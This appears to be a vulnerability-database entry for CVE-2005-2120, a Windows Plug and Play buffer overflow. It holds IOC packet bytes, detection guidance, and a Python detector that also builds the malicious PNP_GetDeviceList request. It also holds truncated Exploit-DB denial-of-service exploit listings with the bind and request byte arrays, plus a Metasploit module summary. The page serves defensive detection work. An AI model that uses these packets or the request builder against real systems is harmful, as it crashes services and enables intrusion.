CVE-2005-2120
Published 2005-10-13
Priority P353 · medium 6.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
Exploit available
EPSS 63.06% (99.1st percentile)
Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call.
Detection & IOCs (extracted from sources)
bytes (NetBIOS session header + SMB header, command 0x72 SMB_COM_NEGOTIATE): \x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8
bytes (DCE/RPC bind PDU, type 0x0b; abstract syntax is the PnP interface 8d9f4e40-a03d-11ce-8f69-08003e30051b v1, transfer syntax NDR 8a885d04-1ceb-11c9-9fe8-08002b104860 v2): 05 00 0b 03 10 00 00 00 48 00 00 00 01 00 00 00 b8 10 b8 10 00 00 00 00 01 00 00 00 00 00 01 00 40 4e 9f 8d 3d a0 ce 11 8f 69 08 00 3e 30 05 1b 01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
bytes (DCE/RPC request PDU, type 0x00, opnum 0x0a PNP_GetDeviceList; the stub begins with a 1024-wchar (0x400) conformant varying wide string whose first characters are "HTREE\ROOT\"): 05 00 00 03 10 00 00 00 30 08 00 00 01 00 00 00 18 08 00 00 00 00 0a 00 44 f7 12 00 00 04 00 00 00 00 00 00 00 04 00 00 48 00 54 00 52 00 45 00 45 00 5c 00 52 00 4f 00 4f 00 54 00 5c 00
bytes (NetBIOS session header + SMB header, command 0x25 SMB_COM_TRANSACTION): \x00\x00\x00\x9A\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x08\x01\xC0
bytes (NetBIOS session header + SMB header, command 0x25 SMB_COM_TRANSACTION): \x00\x00\x08\x84\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc8
- Detect DCE/RPC bind requests targeting the PnP service interface UUID 8d9f4e40-a03d-11ce-8f69-08003e30051b (on the wire, in the bind PDU above, as 40 4e 9f 8d 3d a0 ce 11 8f 69 08 00 3e 30 05 1b) over the SMB named pipe \PIPE\browser, especially from unauthenticated or anonymous sessions on Windows 2000 targets.
- Alert on oversized DCE/RPC PNP_GetDeviceList requests (opnum 0x0a) over SMB: the exploit sends a request body of roughly 2 KB or more filled with repeated 0x5c 0x00 (backslash) wide-char sequences as the device filter string.
- Monitor for services.exe crashes or unexpected restarts on Windows 2000/XP systems; a crash of that process is the direct observable impact of successful exploitation.
- Code execution may be possible if attacker-controlled memory is placed at addresses 0x00000030, 0x0030005C, or 0x005C005C; these are the exploit's target dereference addresses and can be used as memory forensic indicators.
- The exploit targets Windows 2000 SP4 and earlier without authentication; Windows XP SP1 and earlier may also be affected, but exploitation behavior may differ.
- CVE-2005-2120 is distinct from CVE-2005-3644 and CVE-2006-6296, which are related but separate vulnerabilities in the same PNP_GetDeviceList code path; ensure detection rules are scoped correctly.
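The two network detections above (a bind to the PnP interface UUID, and a PNP_GetDeviceList request whose filter string is a flood of wide-char backslashes), as an added example that is not from this page or any of its linked sources: a small Python parser for the DCE/RPC bind and request PDUs carried inside the SMB Transaction on the pipe, applied to the bind bytes from the IOC list and to request PDUs constructed with the same stub layout. The thresholds, the classification labels, the request builder, and the assumption that the remaining PNP_GetDeviceList arguments after the filter string are eight zeroed bytes are this example's own; the NetBIOS/SMB framing around the PDU is not parsed.

```python
import struct
import uuid

# Identifiers from the IOC section above.
PNP_IFACE_UUID = uuid.UUID("8d9f4e40-a03d-11ce-8f69-08003e30051b")
PNP_GETDEVICELIST_OPNUM = 0x0A
PDU_REQUEST, PDU_BIND = 0x00, 0x0B

# Heuristic thresholds: assumptions made for this example, not values from the page.
STUB_LEN_THRESHOLD = 1024        # bytes of stub data before a request counts as oversized
BACKSLASH_RATIO_THRESHOLD = 0.5  # fraction of filter-string wchars that are "\"

# Bind PDU copied from the IOC section: DCE/RPC bind to the PnP interface, NDR transfer syntax.
BIND_PDU = bytes.fromhex(
    "05 00 0b 03 10 00 00 00 48 00 00 00 01 00 00 00 b8 10 b8 10 00 00 00 00 "
    "01 00 00 00 00 00 01 00 40 4e 9f 8d 3d a0 ce 11 8f 69 08 00 3e 30 05 1b "
    "01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00"
)


def _endian(drep0):
    # High nibble of the first data-representation byte: 1 means little-endian integers.
    return "<" if (drep0 >> 4) == 1 else ">"


def parse_pdu(pdu):
    """Parse the 16-byte DCE/RPC common header plus the bind or request body."""
    if len(pdu) < 16:
        raise ValueError("short PDU")
    ptype, e = pdu[2], _endian(pdu[4])
    frag_len, _auth_len, call_id = struct.unpack(e + "HHI", pdu[8:16])
    info = {"ptype": ptype, "frag_len": frag_len, "call_id": call_id, "endian": e}
    if ptype == PDU_BIND:
        # Bind body: max_xmit(2) max_recv(2) assoc_group(4) n_ctx(1) pad(3), then contexts.
        n_ctx, off, syntaxes = pdu[24], 28, []
        for _ in range(n_ctx):
            n_transfer = pdu[off + 2]
            syntaxes.append(uuid.UUID(bytes_le=pdu[off + 4:off + 20]))  # abstract syntax UUID
            off += 24 + 20 * n_transfer                                 # skip version + transfer syntaxes
        info["abstract_syntaxes"] = syntaxes
    elif ptype == PDU_REQUEST:
        alloc_hint, _ctx_id, opnum = struct.unpack(e + "IHH", pdu[16:24])
        info.update(opnum=opnum, alloc_hint=alloc_hint, stub=pdu[24:frag_len])
    return info


def build_getdevicelist_request(filter_text):
    """Build a PNP_GetDeviceList request whose first argument is filter_text, marshalled
    as an NDR conformant varying wide string. The layout (referent id, max count, offset,
    actual count, chars, then 8 zeroed bytes assumed for the remaining arguments) follows
    the request bytes in the IOC section; the referent id 0x0012f744 is copied from them."""
    chars = filter_text.encode("utf-16-le")
    n = len(filter_text)
    stub = struct.pack("<IIII", 0x0012F744, n, 0, n) + chars + bytes(8)
    header = struct.pack("<BBBB4sHHI", 5, 0, PDU_REQUEST, 0x03, b"\x10\x00\x00\x00",
                         24 + len(stub), 0, 1)
    return header + struct.pack("<IHH", len(stub), 0, PNP_GETDEVICELIST_OPNUM) + stub


def count_backslash_wchars(stub, e="<"):
    """Return (actual_count, backslashes) for the leading conformant varying wide string."""
    if len(stub) < 16:
        return 0, 0
    _max_count, _offset, actual = struct.unpack(e + "III", stub[4:16])
    chars = stub[16:16 + 2 * actual]
    bs = "\\".encode("utf-16-le" if e == "<" else "utf-16-be")
    return actual, sum(1 for i in range(0, len(chars) - 1, 2) if chars[i:i + 2] == bs)


def classify(pdu):
    """Apply the two detections above to one PDU carried over the \\PIPE\\browser pipe."""
    info = parse_pdu(pdu)
    if info["ptype"] == PDU_BIND:
        return "pnp-bind" if PNP_IFACE_UUID in info["abstract_syntaxes"] else "other-bind"
    if info["ptype"] == PDU_REQUEST and info["opnum"] == PNP_GETDEVICELIST_OPNUM:
        actual, bs = count_backslash_wchars(info["stub"], info["endian"])
        if (len(info["stub"]) >= STUB_LEN_THRESHOLD and actual
                and bs / actual >= BACKSLASH_RATIO_THRESHOLD):
            return "getdevicelist-backslash-flood"
        return "getdevicelist"
    return "other"


if __name__ == "__main__":
    # A 1024-wchar filter string that starts "HTREE\ROOT\" and is padded with backslashes
    # reproduces the frag_len (0x830) and alloc_hint (0x818) of the request in the IOC section.
    flood = build_getdevicelist_request("HTREE\\ROOT\\" + "\\" * 1013)
    benign = build_getdevicelist_request("HTREE\\ROOT\\")
    for name, pdu in (("bind", BIND_PDU), ("flood", flood), ("benign", benign)):
        print(f"{name:7} {len(pdu):5d} bytes  {classify(pdu)}")
```

The builder exists so the detector can be exercised offline against a PDU with the same shape as the captured one; a real deployment would feed `classify` the DCE/RPC payload carved out of each SMB Transaction on the pipe and would additionally key on the session being anonymous, which a single PDU cannot show.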
GHSA
GHSA-c4pq-7f26-f57v · ghsa_unreviewed · 2022-05-01 · CVE-2005-2120 [MEDIUM]
Advisory text is identical to the CVE description above.
GHSA
GHSA-h3rx-xhvf-jfqc · ghsa_unreviewed · 2022-05-01 · CVSS 6.5 · CVE-2005-3644 [MEDIUM]
PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120.
No detection rules found.
Exploit-DB
Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)
exploitdb · 2005-10-24 · CVE-2005-2120
---
// tested and approved /str0ke
/* Program: Denial of Service attack for MS UMPNPMGR PNP_GetDeviceList
 * Author: Winny Thomas
 * Vulnerability: no length checking on passed parameter to PNP_GetDeviceList in UMPNPMGR.dll
 * Note: The code crashes services.exe on the target, effectively bringing down the target against which it is run.
 * This code is for educational/testing purposes by authorized persons on network systems set up for such purposes.
 * The author shall bear no responsibility for any damage caused by using this code.
 */
/* The header names in the seven #include lines below were lost when the listing was extracted. */
#include
#include // added /str0ke (we don't want errors)
#include // added /str0ke (memcpy loves me)
#include
#include
#include
#include
char SMB_Negotiate[] =
"\x00\x00\x00\x85\
Exploit-DB
Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)
exploitdb · 2005-10-21 · CVE-2005-2120
---
/* The header names in the two #include lines below were lost when the listing was extracted. */
#include
#include
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
/* DCE/RPC bind to the PnP interface (UUID bytes 40 4e 9f 8d ... = 8d9f4e40-a03d-11ce-8f69-08003e30051b) */
unsigned char szBindString[] =
{
    0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
    0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
    0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b,
    0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
    0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
/* DCE/RPC request, opnum 0x0a (PNP_GetDeviceList); the stub carries the oversized filter string */
unsigned char szRequestString[] =
{
    0x05,0x00,
    0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08,
    0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x04,0x
Metasploit
Microsoft Plug and Play Service Registry Overflow
This module triggers a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the services.exe process, this module will result in a forced reboot on Windows 2000. Obtaining code execution is possible if user-controlled memory can be placed at 0x00000030, 0x0030005C, or 0x005C005C.
No writeups or analysis indexed.
References
http://secunia.com/advisories/17166
http://secunia.com/advisories/17172
http://secunia.com/advisories/17223
http://securityreason.com/securityalert/71
http://securitytracker.com/id?1015042
http://support.avaya.com/elmodocs2/security/ASA-2005-214.pdf
http://www.eeye.com/html/research/advisories/AD20051011c.html
http://www.kb.cert.org/vuls/id/214572
http://www.osvdb.org/18830
http://www.securityfocus.com/bid/15065
http://www.us-cert.gov/cas/techalerts/TA05-284A.html
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-047
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1244
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1328
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1519